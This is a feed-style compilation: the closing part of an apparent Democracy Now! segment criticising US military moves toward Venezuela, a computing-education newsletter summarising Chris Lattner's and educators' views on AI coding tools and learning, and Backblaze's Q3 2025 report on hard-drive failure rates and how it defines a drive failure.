JUAN GONZÁLEZ: Yeah, well, Amy, I think with the – especially now, not only with these attacks on boats and these killings, but now with the arrival of an unprecedented military force – we’re talking the largest aircraft carrier in the world, the USS Gerald Ford, has just arrived in the Caribbean with another 5,000 troops and several other battleships accompanying it.

We now have 15,000 U.S. troops in the region, thousands of them based in Puerto Rico. The government has reopened Roosevelt Roads Naval Base, which they had closed, and U.S. planes at the old Ramey Air Force Base in Aguadilla. All of these soldiers are not there to hang out. They’re there to take military action. We have to be clear.

Even though the government hasn’t announced it, it’s clear that this is what’s coming. Our government is embarking on a totally unprovoked military assault and regime change operations in Latin America. The Trump administration has openly accused not one but two Latin-American presidents of drug dealing without any proof, Nicolas Maduro of Venezuela and Gustavo Petro of Colombia and threatened to kill Maduro. This is a bizarre return to the gunboat diplomacy of the early 20th century.

And the big prize being not democracy or not stopping drug trafficking, but grabbing the Venezuelan oil fields, the largest oil reserves in the world. The problem is, this is not the old Latin America that the U.S. could bully at will. The countries at the region are today independent sovereign states.

For most of South America, the U.S. is no longer even the main trading partner, China is. Next door to Venezuela is Colombia, the country that for more than 50 years was involved in the longest-running civil war in the region’s history and has perhaps the largest number of veteran left-wing guerillas in Latin America’s history. The governments of Brazil, Mexico, Colombia, Honduras, Cuba, and Nicaragua will not just quietly accept U.S. aggression on Venezuela.

President Maduro has appealed for international volunteers to come to Venezuela to oppose any U.S. invasion, and you can bet that perhaps thousands of young Cubans, Nicaraguans, Colombians, and other Latin Americans will do just that.

So, progressives and people of good will of the U.S. and Puerto Rico, it’s time for those of us here to stand up and say that we will not support any attempt to bring back the old gunboat diplomacy and to invade another Latin-American country, and we need to do it soon because this stuff is moving very quickly.

AMY GOODMAN : Juan, you mentioned that you have Venezuela, the largest oil producer in Latin America, that the U.S. is targeting. Then, to everyone’s shock, including many in his own administration, Trump announced he’s going to attack Nigeria, which is Africa’s most populous country and the largest oil producer in Africa. He said that the attack would be vicious and sweet. And then, you go back to Iraq, one of the largest oil producers in the Middle East, before the U.S. invaded Iraq in 2003 after 9/11, which Iraq had nothing to do with.

JUAN GONZÁLEZ: Yes, it’s a clear continued policy of the United States to control oil production as much as it can as the Trump administration continues on this crazy, bizarre attempt to corner as much oil supply as they can as it continues to deny the existence of climate change or the climate catastrophe we face.

AMY GOODMAN : Well, coming up, “You’ve Arrived in Hell,” a new Human Rights Watch report, details how Venezuelans, sent by the U.S. to El Salvador’s CECOT mega prison, were tortured and abused. Juan Pappier will stay with us. We hope you do, too.

[break]

AMY GOODMAN : “Contra Todo (Against Everything)” by iLe, performing in our Democracy Now! studio.


Don't turn your brain off

Hacker News
computingeducationthings.substack.com
2025-11-14 13:12:11
Comments...
Original Article

Chris Lattner created some of the most influential programming languages and compiler technologies of the past 20 years. He is the creator of LLVM, used by languages like Swift, Rust, and C++; created the Swift programming language; worked on TensorFlow; and now works on the Mojo programming language. In this conversation, they cover the origin story of LLVM and how Chris convinced Apple to move all of its major dev tools over to this new technology; how Chris created Swift at Apple, including how they worked on the new language in secrecy for a year and a half; why Mojo is a language Chris expects to make building efficient AI programs easier and faster; how Chris uses AI tools and what productivity improvements he sees as a very experienced programmer; and much more. If you’d like to understand how a truly standout software engineer like Chris thinks and gets things done, and how he’s designing a language that could be a very important part of AI engineering, then this episode is for you.

Chris Lattner encourages his team to use AI coding tools like Claude Code and Cursor. For experienced programmers like himself, these tools provide about 10% productivity gains, mainly by handling mechanical rewrites and reducing tedious work, which increases both productivity and coding enjoyment.

However, the impact varies significantly by use case. For PMs and prototypers building wireframes, AI tools are transformative—enabling 10x productivity improvements on tasks that might not otherwise get done. But for production coding, results are mixed. Sometimes AI agents spend excessive time and tokens on problems a human could solve faster directly.

His key concern: programmers must keep their brains engaged. AI should be a “human assist, not a human replacement.” For production applications, developers need to review code, understand architecture, and maintain deep system knowledge. What he cares about most is keeping production architecture clean and well-curated—it doesn’t need to be perfect, but it needs human oversight. AI coding tools can go crazy, duplicating code in different places, which creates maintenance nightmares when you update two out of three instances and introduce bugs. “Vibe coding” (letting AI handle everything) is risky—not just for jobs, but because it makes future architectural changes nearly impossible when no one understands how the system works. As Chris puts it: “The tools are amazing, but they still need adult supervision.” Keeping humans in the loop is essential for security, performance, and long-term maintainability.

Chris Lattner’s team hires two types of people: super-specialized experts (compiler nerds, GPU programmers with 10+ years of experience) and people fresh out of school . He finds early-career hires particularly exciting because “they haven’t learned all the bad things yet.”

For early-career candidates, he looks for intellectual curiosity and hunger—people who haven’t given up to “AI will do everything for me.” He wants fearless individuals willing to tackle things that sound terrifying or “impossible and doomed to failure” with a “how hard can it be? Let’s figure it out” attitude. Hard work and persistence are essential in the rapidly changing AI space where many people freeze up instead of adapting.

He particularly values open source contributions, which he considers the best way to prove you can write code and work with a team—a huge part of real software engineering. Internships and hands-on experience also matter. During conversations, he can tell when candidates are genuinely excited about what they do versus just “performatively going through the motions.”

His interview philosophy emphasizes letting candidates use their native tools, including AI coding assistants for mechanical tasks. Making people code on whiteboards without their normal tools would be “very strange” today. He also recognizes that nervousness affects performance, so creating a comfortable environment matters.

Chris Lattner argues that with AI making code writing easier than ever, the focus should shift to code readability , not optimizing for LLMs. Code has always been read more often than it’s written, and that hasn’t changed.

For him, great programming languages need two things in balance: expressivity (can you express the full power of the hardware?) and readability (can you understand the code and build scalable abstractions?). JavaScript can’t write efficient GPU kernels because it lacks expressivity. Assembly code has full expressivity but no readability. The sweet spot is the intersection of both.

This is why Mojo embraces Python’s syntax—it’s widely known and easy to read—while replacing Python’s entire implementation to unlock full hardware performance. He believes LLMs will continue improving at handling any language quirks, and they’re already an amazing way to learn new languages.

His advice for making code LLM-friendly? Make it human-friendly first. Better error messages for humans are better for agents too. The most important thing for LLM-based coding is having massive amounts of open source code—Modular’s repo has 700,000 lines of Mojo code, complete with full history, giving LLMs a huge dataset to learn from.

On why compilers are cool: unlike other university classes where you “build a thing, turn it in, throw it away,” compiler courses teach iterative development. You build a lexer, then a parser on top of it, then a type checker, and keep building higher. If you make mistakes, you must go back and fix them—mirroring real software development. Today it’s easier than ever to learn compilers through resources like LLVM’s Kaleidoscope Tutorial and the Rust community. While not everyone needs to become a compiler engineer, the field deserves more credit and offers great career opportunities.

He also believes we’ve reached a point where we’re operating at a new higher level of abstraction, as other authors have noted as well, with software engineers acting as supervisors of AI agents: reviewing, editing, and debugging AI-generated code. He also points out that for a long time, syntax and the high rigidity of programming had become barriers to entering the CS field, and GenAI is now democratizing access. It’s true that we’re seeing many more people doing some form of programming.

Now, this lower barrier to entry introduces new teaching approaches for more diverse students — I’m thinking about those non-computing students interested in creating apps or websites for fun, for example, and teaching them the architectural implications of those websites. Clearly, within the CS major, the increasingly common opinion is that AI is a productivity booster for experts, and the results for novices are still unclear. As I’ve said several times in this newsletter, it’s essential to understand what we’re doing under the hood for various reasons, such as social factors, performance, and security.

Juho reminds us that companies will hire students who know more about AI, but not if they over-rely on it. One question that comes up is how we can motivate students to learn programming if there’s a tool that does it for them and banning it simply isn’t an option.

Finally, he talks about a challenge that I’m not fully convinced is 100% true — based on what several senior engineers have been saying over the past few months — but it does make sense: seniors are slowing down junior hiring because now they can use AI to handle tasks they would have previously delegated. He says this is a danger to workforce diversity.

As always, Juho makes good points. I recommend following him on LinkedIn and on Google Scholar so you don’t miss his upcoming papers — and his previous ones, which are closely related to all of this.

Historically, to get a job in the tech industry, you needed a CS degree. CS is not considered to be an easy major. It is often multiple years of intense training across a variety of technical and mathematical topics. Now, what has made getting CS education more complicated, just like we’ve seen in so many other parts of the industry, is the rise of AI agents. As a student, how do you learn critical thinking and problem solving when you’re just a few keystrokes away from talking to an AI agent who will not only answer the question for you, but also give you a very detailed rundown of why things work the way they do? And so, taking a step back and looking even broader, is there even value in the future for a CS education when, like many people predict, an AI agent can increasingly be more capable at building very complex systems with very little technical know-how needed by the human in the loop?

I loved this conversation between Kirupa Chinnathambi and Elisa Cundiff .

What struck me most was:

Kirupa on entering the teaching profession (similar feelings here):

Teaching allows us to share real-world insights that students can truly benefit from. Kirupa believes that if we can simplify complicated topics and make them understandable, it proves we genuinely understand the subject—we know what matters, what doesn’t, and what can wait until day five or day ten, rather than overwhelming students with everything on day one. For him, teaching helps him stay relevant as part of his work.

Elisa Cundiff on access to information:

Current paradox: while students have better educational tools than ever before, they face the problem of not knowing what to learn or which resources to use among thousands of available options. Having access doesn’t guarantee direction.

Kirupa on struggle and sequential learning:

In the past, the scarcity of resources forced sequential and gradual learning (starting with basic HTML, then inline colors, understanding hex codes...). This process of “noodling” or struggling with basic problems generated a deep understanding of why things work. Today, with so many resources available, students never spend enough time struggling with the most basic problems, which can prevent them from developing a true appreciation of the fundamentals.

Elisa Cundiff on fundamentals in the ChatGPT era:

After the initial panic about chatbots (is it the new calculator/Wikipedia?), the emerging consensus among educators is that students must learn the fundamentals first. Without understanding the underlying concepts, they can’t audit AI code for correctness, security, maintainability, or efficiency, nor debug it. Once they master the fundamentals, then they should be introduced to AI tools to speed up their work before graduating.

Kirupa on critical thinking through struggle:

One of the best ways to develop critical thinking is through making mistakes and learning from them—breaking down questions into sub-questions and figuring out answers through trial and error. In the past, there was no Plan B when learning programming; you had to struggle through problems. If no one on Yahoo, Lycos, or Excite had the answer, you figured it out yourself through experimentation. This struggle created retention because you spent so much time learning what didn’t work before discovering what did. Today, everyone has a Plan B just five seconds away: copy-paste into a chatbot that provides a 90-99% accurate answer with an explanation. Students aren’t exploring on their own anymore—they’re just reading from the screen, memorizing rather than experiencing the struggle of true learning.

Elisa Cundiff on the illusion of learning:

Students face the illusion of having accomplished something. In her intro Python course (which counts as arts and humanities), 25% of the grade comes from writing—where she first saw widespread AI-generated essay cheating. When she talked to 35 students last fall, most acknowledged they weren’t getting anything from it and recognized the essays weren’t theirs. They kept saying “it’s too easy”—in moments of panic, they think turning something in is better than nothing. Cheating used to be harder. Most students recognize the speed-accuracy tradeoff isn’t resulting in cognitive development.

Elisa on fundamentals and critical thinking:

No matter what the future holds, students need to be critical thinkers. Learning basic programming concepts are little puzzles that help them learn to think. These can be made fun and are worth keeping—not only to build foundational understanding, but to develop critical thinking skills.

The conversation concludes with reflections on AI’s impact on education, comparing it to past disruptions like the internet, Wikipedia, and MOOCs. Elisa emphasizes that the educator’s role as curator becomes even more important— providing structure, end goals, and curated learning environments in a world of overwhelming information . Derek Muller’s point is referenced: each generation predicted education’s destruction (internet in the 90s, Wikipedia in the 2000s, MOOCs), but education persists because students need structured, joyful guidance that answers the “why” and builds skills . Kirupa expresses uncertainty about his own teaching role’s future value, questioning whether what he teaches will meaningfully impact students when AI provides quick answers. Both acknowledge the unprecedented uncertainty students face and the challenge of preparing them for an unknowable future.

For me, being a good educator means being a good communicator. Storytelling is a big part of teaching. This week I was listening to Fernandisco , who is a legend in Spanish music radio. He’s currently a host/DJ on the music station Los 40 Classic and directs a music magazine show in prime time. He’s a tastemaker—one of those people who filter through the avalanche of available music to help us discover—or rediscover—all the great work being done.

Here’s what I learned from him in this episode:

On being a good communicator:

For me, every day is something very special because the person listening to you comes back to you because you are part of the emotion they’ve been building throughout their lives. And it’s a daily miracle. Radio isn’t something where every five days you need to do a good show. You have to do it every day because people deserve the best.

On the algorithm:

When you’re listening to me in the morning, you know that I am the algorithm—that’s the difference. The music I’m going to play for you, I know is good, and it’s music people want to hear explained by a storyteller.

This one by Stuart Russell and Peter Norvig is perhaps the go-to book when you want an overview of AI. Here it is in web format.

Chip Huyen’s books have received excellent reviews.

And for machine learning, I’d recommend this one—especially for reviewing the mathematical foundations behind it.

If you’re looking for something concise and enjoyable, ideal for entering the world of ML, I’d probably recommend Andriy Burkov’s book.

As for deep learning, this introduction has been well received in both academia and industry.

Following on from last week’s topic, Matt Pocock on how he uses Claude Code in his programming workflow.

Laurie Gale from the Raspberry Pi Foundation has been exploring the use of PRIMM alongside debugging. He’s been developing an amazing online tool/environment that all but forces learners to interact with the code, suggest ideas, and debug and resolve issues.

This is a very useful instructional resource with interactive exercises for getting novice students to practice Java and Python. The exercises in section 10 are especially interesting to me.

Enjoyed this technical conversation on autonomous driving on the Google DeepMind podcast a lot. It’s worth a listen!

Survey on how CS1 instructors perceive programming quality.

The Computing Research Association (CRA) is interested in the professional development of students in the field of computing. Since you are probably no longer a grad student, you can encourage your students to complete this survey. Any contribution provides valuable information for future students who are considering this amazing field of computing.

CCSCNE 2026 Submission Reminder: Conference website.

Call for Submissions: Innovations and Opportunities in Liberal Arts Computing Education (SIGCSE 2026).

Deadline Changed to Nov 16 AoE for the SIGAI Innovative AI Education Program.

ICER 2026 Call for Papers: Abstracts 20th Feb, Papers 27th Feb.

Register now for the next free ACM TechTalk, “A Look at AI Security with Mark Russinovich,” presented on Wednesday, December 3 at 1:00 PM ET/18:00 UTC by Mark Russinovich, CTO, Deputy CISO, and Technical Fellow for Microsoft Azure. Scott Hanselman, Vice President of Developer Community at Microsoft and member of the ACM Practitioner Board, will moderate the question-and-answer session.

CSUN seeks tenure-track Assistant Professor in Computer Science with expertise in areas like Cloud Computing, Cybersecurity, AI, or related fields, to teach undergraduate/graduate courses and contribute to equitable student outcomes through teaching, research, and service.

This post from Josh Brake on the FDE concept was a good read. I agree with Josh that every challenge is an opportunity for innovation. Check out the interesting apps some educators are developing to give students new and meaningful ways to engage with learning. This mindset of a Forward Deployed Educator offers one of those fruitful directions.

I’m thinking here about the kind of interactive visualizations that can be a very useful tool for helping students build intuition about a concept and engage in curious play. It’s the interactive single-page web apps that help students test their knowledge of assembly and machine language in my digital design and computer engineering class. It’s the custom multitasking simulator that helps students visualize how different scheduling algorithms behave and how they affect performance and context-switching overhead in a real-time operating system. Now, instead of being frustrated by existing tools that don’t do quite what you want, or by the insurmountable time investment required to build a small tool just to illustrate a concept in a single lesson, you can get to a serviceable demo in only a few prompts.

Earlier this year, my friend Punya Mishra shared a Unit Circle Demo that he mocked up with GPT-o1 to show the connection between sines, cosines, and the unit circle. In a post a month later, he mused about how even incorrect simulations can be used to push students to be more curious and to develop healthy skepticism. Just yesterday, Lance Cummings wrote about the Writing Gym Tracker app that he built to help his students build their writing practices. In the before times, you’d have to live with the limitations or bugs in another developer’s app, bugging them to fix or add the features you wanted. Now you can just build and deploy your own with a few prompts.

This piece by OpenAI is a great read:

Even among top models, performance varies significantly by task.

Ethan Mollick raises a very true point this week:

Anyone who wants to use AI seriously for real work will need to assess it themselves.

I strongly agree with this. The author is Senén Barro, who teaches at the University of Santiago de Compostela (Spain):

I’ve mentioned before that since ChatGPT came out, my students barely use office hours anymore. That said, I hope that with these new tools designed specifically for them, they won’t stop coming to class. Either way, if they do stop coming, it’ll be more my fault than AI’s. These tools, at least for now, aren’t free from hallucinations, incorrect or poorly structured explanations, and while they’ve read everything, they haven’t experienced anything—which means they’re unaware of many aspects of the real world that go far beyond the world described in texts—what we might call the written world.

As I’ve mentioned before here and here:

Either I, as a professor, know how to offer more than these tools do, or my students are honestly wasting their time with me.

My co-advisor Michael wrote in the NYT about the shift from coding to supervising AI-generated code:

The essential skill is no longer simply writing programs but learning to read, understand, critique and improve them instead. The future of computer science education is to teach students how to master the indispensable skill of supervision.

Most education doesn’t yet emphasize the skills critical for programming supervision — which hinges on understanding the strengths and limitations of A.I. tools.

Changing what we teach means rethinking how we teach it. Educators are experimenting with ways to help students use A.I. as a learning partner rather than a shortcut.

The rise of generative A.I. should sharpen, not distract, our focus on what truly matters in computer science education: helping students develop the habits of mind that let them question, reason and apply judgment in a rapidly evolving field.

James Prather is presenting our work today in Koli! You can also find our paper in the ACM proceedings.

Excited to hear Binoy Ravindran from Virginia Tech at our CS graduate seminar next Monday. Binoy leads the Systems Software Research Group at VT. If you’re in Houston, it would be great if you could join us. Here is the link to the event if you’re interested in coming.

First NCAAB game in the US and it was AMAZING! Houston crushed Towson 65-48 with Kingston Flemings dropping 20 points for the MVP. That stadium energy was UNREAL. But the real MVP? Persian food before the game with the best company (protip: always go with real Iranians). Go Coogs!

Nothing like a coffee and good conversation with Luke on campus. Friendships that started at the Newman and continue to grow.

Personal achievement: I passed my US driving test yesterday! I’m so happy about it.

This week I’ve been listening on repeat to Viva Suecia’s wonderful new album.

The most extraordinary thing in the world is an ordinary man and an ordinary woman and their ordinary children.

― G.K. Chesterton

That's all for this week. Thank you for your time. I value your feedback, as well as your suggestions for future editions. I look forward to hearing from you in the comments.

Backblaze Drive Stats for Q3 2025

Hacker News
www.backblaze.com
2025-11-14 13:10:19
Comments...
Original Article
An illustration of chart bars with the words Backblaze S3 2025 Drive Stats overlaid

Every quarter, Drive Stats gives us the numbers. This quarter, it gave us a crisis of meaning. What does it really mean for a hard drive to fail? Is it the moment the lights go out, or the moment we decide they have? Philosophers might call that an ontological gray area. We just call it Q3.

As of June 30, 2025, we had 332,915 drives under management. Of that total, there were 3,970 boot drives and 328,348 data drives. Let’s dig into our stats, then talk about the meaning of failure.

This quarter, we have more to talk about (Stats-wise)

Drive Stats was the beginning. Want to see more of the full picture? Check out the Stats Lab webinar, bringing together content from all of our Stats articles. We’re going to chat about all things Backblaze (and beyond)—by the numbers.

Save My Seat

Drive Stats: The digest version

An infographic of Backblaze Drive Stats Q3 2025 data

Q3 2025 hard drive failure rates

During Q3 2025, we were tracking 328,348 storage drives. Here are the numbers:

Backblaze Hard Drive Failure Rates for Q3 2025

Reporting period July 1, 2025–September 30, 2025 inclusive
Drive models with drive count > 100 as of July 1, 2025 and drive days > 10,000 in Q3 2025

An image of a chart showing annualized failure rates for drive models in the Backblaze hard drive fleet

Notes and observations

  • The failure rate has increased: And by quite a bit. As a reminder, last quarter’s AFR was 1.36%, compared with this quarter’s 1.55%. (Interestingly, the 2024 yearly AFR was 1.57%.)
  • That new drive energy: Say hello to the 24TB Toshiba MG11ACA24TE, joining the drive pool with 2,400 drives and 24,148 drive days. That means that we’ve hit the thresholds for the quarterly stats, but not the lifetime.
  • The zero failure club: It was a big quarter for the zero failure club, with four drives making the cut:
    • HGST HMS5C4040BLE640 (4TB)
    • Seagate ST8000NM000A (8TB)
    • Toshiba MG09ACA16TE (16TB)
    • Toshiba MG11ACA24TE (24TB)—and yes, that’s the new drive.

For those of you tracking the stats closely, you’ll notice that the Seagate ST8000NM000A (8TB) is a frequent flier on this list. The last time it had a failure was in Q3 2024—and it was just a single failure for the whole quarter!

  • The highest AFRs were really high: So high, in fact, that this quarter they inspired us to run an outlier analysis using the standard quartile approach (Tukey method). Based on that analysis, any drive with a quarterly AFR higher than 5.88% is an outlier, and there are three:
    • Seagate ST10000NM0086 (10TB): 7.97%
    • Seagate ST14000NM0138 (14TB): 6.86%
    • Toshiba MG08ACA16TEY (16TB): 16.95%

What’s going on there? Great question, and we’ll get into that after the lifetime failure rates.

Lifetime hard drive failure rates

To be considered for the lifetime review, a drive model was required to have 500 or more drives as of the end of Q2 2025 and over 100,000 accumulated drive days over its lifetime. After removing the drive models that did not meet the lifetime criteria, we were left with 27 drive models for analysis, as shown in the table below.

Backblaze Hard Drive Lifetime Failure Rates

A table of lifetime failure rates of Backblaze's drive fleet.

Notes and observations

  • That lifetime AFR is pretty consistent, isn’t it? The lifetime AFR is 1.31%. Last quarter we reported that it was 1.30%, and the quarter before that, it was 1.31%.
  • The 4TB average age hasn’t shifted: As we’ve reported on previously, the 4TB drives are being decommissioned over time. Now, we’re down to just a handful left—just 11 of the ALE models and 187 of the BLE models. But, because their lifetime populations are so comparatively large, the additional drive days aren’t enough to move the needle on the average age in months. So, no ghosts in the machine here, and decommissioning is proceeding as planned.
  • Steady uptick in higher capacity drives: Of the 20TB+ drives that meet our lifetime data parameters, we’ve added 7,936 since last quarter. And, don’t forget that our newest entrant to the cohort, the Toshiba MG11ACA24TE (24TB), hasn’t made its way to this table yet—that adds an additional 2,400 drives. Altogether, the 20TB+ club represents 67,939 drives, or about 21% of the drive pool.

Defining a failure—from a technical perspective

A question that’s come up a few times when we’re hosting a webinar or chatting in the comments section is how we define a failure. While it may seem intuitive, it’s actually something of a meaty conundrum, and something we haven’t addressed since the early days of this series. Tracking down the answer to this question touches internal drive fleet monitoring tools (via SMART stats), the actual Drive Stats collection program, and our data engineering layer. I’ll dig into each of these in detail, then we’ll take a look at the outliers for this quarter.

SMART stats reporting

We use Smartmontools to collect the SMART attributes of drives, and another monitoring tool called drive sentinel to flag read/write errors that exceed a certain threshold as well as some other anomalies.

The main indicator we use for determining if a drive should be replaced is when it responds to reads with uncorrectable medium errors. When a drive reads the data from the disk, but the data fails its integrity check, the drive will try to reconstruct the data using internal error correction codes. If it is unable to reconstruct the data, it notifies the host by reporting it as an uncorrectable error and marks that part of the disk as pending reallocation, which shows up in SMART under an attribute like Current_Pending_Sector.
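As a rough host-side illustration (not Backblaze’s actual tooling), here is a minimal Python sketch that reads that attribute through smartmontools’ JSON output; the device path is a placeholder, and the exact JSON field names can vary by drive type and smartmontools version (the --json flag needs smartmontools 7.0 or later).

import json
import subprocess

def pending_sectors(device: str) -> int:
    # Ask smartctl for SMART attributes in JSON form and pull out the raw
    # Current_Pending_Sector value; returns 0 if the attribute is absent.
    out = subprocess.run(["smartctl", "--json", "-A", device],
                         capture_output=True, text=True, check=False)
    report = json.loads(out.stdout)
    for attr in report.get("ata_smart_attributes", {}).get("table", []):
        if attr.get("name") == "Current_Pending_Sector":
            return attr.get("raw", {}).get("value", 0)
    return 0

device = "/dev/sda"  # placeholder device path
if pending_sectors(device) > 0:
    print(f"{device}: sectors pending reallocation, flag for review")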

On Storage Pods that control drives through SATA links, the drive sentinel will count the number of these uncorrectable errors a drive reports and if it exceeds a threshold, access to the drive will be removed. This is important in the classic Backblaze Storage Pods where five drives share a single SATA link and errors by one drive will affect all drives on the link.

On Dell and SMCI pods that use a SAS topology to connect drives, drive sentinel doesn’t remove access to drives because the errors are reported differently; that’s also less critical, though, since SAS minimizes the impact that a problem disk can have on others.

The Drive Stats program

We’ve talked about the custom program we use to collect Drive Stats in the past, and here’s a quick recap:

The podstats generator runs every few minutes on every Storage Pod (what we call any host that holds customer data). It’s a C++ program that collects SMART stats and a few other attributes, then converts them into an .xml file (“podstats”). Those are then pushed to a central host in each datacenter and bundled. Once the data leaves these central hosts, it has entered the domain of what we will call Drive Stats.

For this program, the logic is relatively simple: A failure in Drive Stats occurs when a drive vanishes out of the reporting population. It is considered “failed” until it shows up again. Drives are tracked by serial number and we report daily logs on a per-drive basis, so truly, we can get pretty granular here.
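In toy Python terms (a sketch, not the real Drive Stats code), that rule is just a set difference over the daily per-serial logs:

def provisionally_failed(yesterday: set[str], today: set[str]) -> set[str]:
    # Serials that reported yesterday but not today count as failed until
    # they re-enter the reporting population.
    return yesterday - today

# Example with made-up serial numbers:
day1 = {"ZCH0A1B2", "ZCH0C3D4"}
day2 = {"ZCH0C3D4"}
print(provisionally_failed(day1, day2))  # {'ZCH0A1B2'}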

The data engineering layer

To recap, we’ve collected our SMART stats and compiled them with the podstats program. Now we’ve got all the information, and data intelligence needs to add the context. A drive may go offline for a day or so (not return a response to those tools that collect daily logs of SMART stats), but it could be something as simple as a loose cable. So, time-wise, if a drive reappears after one day or 30, at what point in that period of time do we classify it as an official failure?

Previously, we manually cross-referenced data center work tickets, but these days, we’ve automated that process. On the backend, it’s a SQL query, but in human speak, this is what it comes down to:

  1. If a drive logs data on the last day of the selection period (which in this case is a quarter) then it has not failed.
  2. There are three human-curated tables that the query cross references. If a drive serial number appears on one of them, it tells us whether there’s a failure or not (depending on the table’s function).
  3. If the drive serial number is the primary serial number in a drive replacement Jira ticket then it has failed. (Jira is where we track our data center work tickets.)
  4. If the drive serial number is the target serial number in a clone Jira ticket or a (temp) replacement ticket, then it has not failed.

Basically, when we go to write the Drive Stats reports at the end of the quarter, if a drive has either appeared in one of our various work trackers or hasn’t re-entered the population, then it’s considered failed.
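For readers who prefer code to prose, here is a hedged Python sketch of that decision order. The real implementation is a SQL query against internal tables; every table and field name below is hypothetical, and only the ordering of the checks mirrors the description above.

from dataclasses import dataclass, field

@dataclass
class QuarterContext:
    logged_last_day: set[str]                                    # serials that logged data on the quarter's last day
    curated_failed: set[str] = field(default_factory=set)        # hypothetical human-curated override
    curated_not_failed: set[str] = field(default_factory=set)    # hypothetical human-curated override
    replacement_primary: set[str] = field(default_factory=set)   # primary serials on drive-replacement tickets
    clone_or_temp_target: set[str] = field(default_factory=set)  # target serials on clone / temp-replacement tickets

def counts_as_failed(serial: str, ctx: QuarterContext) -> bool:
    if serial in ctx.logged_last_day:
        return False
    if serial in ctx.curated_failed:
        return True
    if serial in ctx.curated_not_failed:
        return False
    if serial in ctx.replacement_primary:
        return True
    if serial in ctx.clone_or_temp_target:
        return False
    return True  # vanished and never re-entered the population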

In rare instances, that can mean we have so-called “cosmetic” failures, when work we’re doing on a drive model lasts longer than that quarterly collection period. And, spoiler, we have one of those instances that showed up in the data this quarter—our outlier Toshiba drive with the 16.9% failure rate. We’ll dig in in just a minute; but first, some context.

Connecting drive failure to the overall picture of the drive pool

As we mentioned above, certain drives in the pool had such high swings in AFR that we ended up running an outlier analysis using the quartile method. (It’s also worth mentioning that a cluster analysis could potentially be a better fit, but we can save that for another day.) Based on that analysis, anything that has above a 5.88% failure rate is an outlier.
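Mechanically, the Tukey rule is just quartiles plus a 1.5x interquartile-range fence. Here is a minimal Python sketch with placeholder AFR values; the 5.88% fence in this report comes from the real per-model distribution, not from these numbers.

import statistics

def upper_tukey_fence(afrs: list[float]) -> float:
    q1, _, q3 = statistics.quantiles(afrs, n=4)  # quartiles of the quarterly AFRs
    return q3 + 1.5 * (q3 - q1)

sample_afrs = [0.4, 0.6, 0.8, 1.0, 1.2, 1.4, 1.7, 2.0, 2.3, 8.0, 17.0]  # placeholder percentages
fence = upper_tukey_fence(sample_afrs)
print(fence, [a for a in sample_afrs if a > fence])  # fence, then the outliers above it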

The primary motivation was an attempt to visualize the relationship between a drive’s age in months and this quarter’s AFRs.

A scatter plot that shows the relationship between the age in months of a drive versus this quarter’s AFRs

And yes, we’re fully aware that that’s a… super unreadable scatter plot. Removing the labels, this is a bit better:

A scatter plot that shows the relationship between the age in months of a drive versus this quarter’s AFRs

We’re interested, really, in the shape of the relationship. If we posit that the older drives get, the higher their failure rates, you’d expect a larger concentration in the top right quadrant. But, our data follows a much more interesting pattern than that, with most of our data points concentrated in the lowest regions of the graph regardless of age—something you’d expect from a set of data that reflects a bunch of smart folks actively working towards the goal of a healthy drive population. And yet, we have some data points that break the mold.

As is pretty intuitive to my business intelligence folks in the audience, the process of identifying outliers is actionable data as well. Just like all press is good press, in our world, more data is more better. So, let’s take a closer look at those outliers. As a reminder, that’s these three drive models:

  • Seagate ST10000NM0086 (10TB): 7.97%
  • Seagate ST14000NM0138 (14TB): 6.86%
  • Toshiba MG08ACA16TEY (16TB): 16.95%

Seagate ST10000NM0086 (10TB)

This drive has some pretty explainable factors behind its high failure rate. It’s well over seven years old (92.35 months). And, since there are only 1,018 drives of this model in operation, single failures hold a lot of weight compared with the average drive count per model—which comes in at 10,952 if you use the mean of this quarter’s data and 6,177 if you use the median.
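To see how much weight a single failure carries at that population size, here is a back-of-the-envelope Python sketch using the standard AFR arithmetic (failures divided by drive days, annualized); the drive-day count is approximated as 1,018 drives times 92 days in the quarter, ignoring mid-quarter churn.

drives = 1018
drive_days = drives * 92  # rough: every drive present for the whole quarter

def afr(failures: int, drive_days: int) -> float:
    # Annualized failure rate in percent: failures per drive day, scaled to a year.
    return failures / drive_days * 365 * 100

print(round(afr(1, drive_days), 2))   # ~0.39 points of AFR from a single failure
print(round(afr(20, drive_days), 2))  # ~7.8%, in the neighborhood of this model's 7.97%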

And, you can see that borne out in the trend in the last year of data:

A chart showing the failure rates for drive model Seagate-ST10000NM0086-10TB for the last year.

Seagate ST14000NM0138 (14TB)

This drive is nearing five years in age (56.57 months) and, again, has a lower drive count at 1,286. More importantly, this particular drive model has had historically high failure rates. In parallel with above, here’s the last year of quarterly failure rates:

A chart showing the failure rates for the drive model Seagate-ST14000NM0138-14TB for the last year.

Toshiba MG08ACA16TEY (16TB)

Finally, our Toshiba model is the most interesting of all. It’s less than four years old (44.61 months) and has 5,145 drives in the pool. And this quarter is clearly a departure from its normally decent AFRs.

A line graph of the Toshiba MG08ACA16TEY failure rates from Q3 2024 to Q3 2025

When we see deviations like this one, it’s usually an indication that there’s something afoot.

Never fear, Drive Stats fans; this was a known quantity before we went on this journey. This past quarter, working with Toshiba, we deployed some firmware updates they provided to optimize performance on these drives. Because we needed to pull drives to achieve this in some cases, we had an abnormal number of “failed” drives in this population.

What that means for this drive is that it’s actually not a bad drive model; and, given the ways we and Toshiba have worked together on a fix, we should see failure rates normalizing in the near future. And, this also goes back to our conversation of defining a failure—in this case, while the drives “failed,” the failure wasn’t mechanical and was based on something that we’ll be able to fix without replacing the drives. In short, don’t sweat the spike and pay attention to the long arc of performance on this population. We expect to see those drives happy and spinning for years to come (and with better performance, too).

The Hard Drive dataset (and beyond)

Thank you, as always, for making it through ~2,500 words to examine the fun side of data. Here’s our standard fine print:

The complete dataset used to create the tables and charts in this report is available on our Hard Drive Test Data page. You can download and use this data for free for your own purposes. All we ask are three things:

  1. You cite Backblaze as the source if you use the data;
  2. You accept that you are solely responsible for how you use the data, and;
  3. You do not sell this data itself to anyone; it is free.

If you’re a new Drive Stats fan, consider signing up for the newsletter. If you’re not ready for that kind of commitment, sound off in the comments section below or reach out directly to us to let us know what you’re working on. Happy investigating!

Meet the Backblaze Drive Stats team, and sign up for more newsletter happenings on the Drive Stats newsletter.

Stephanie Doyle is the Writer and Blog Operations Specialist at Backblaze. She specializes in taking complex topics and writing relatable, engaging, and user-friendly content. You can most often find her reading in public places, and can connect with her on LinkedIn.

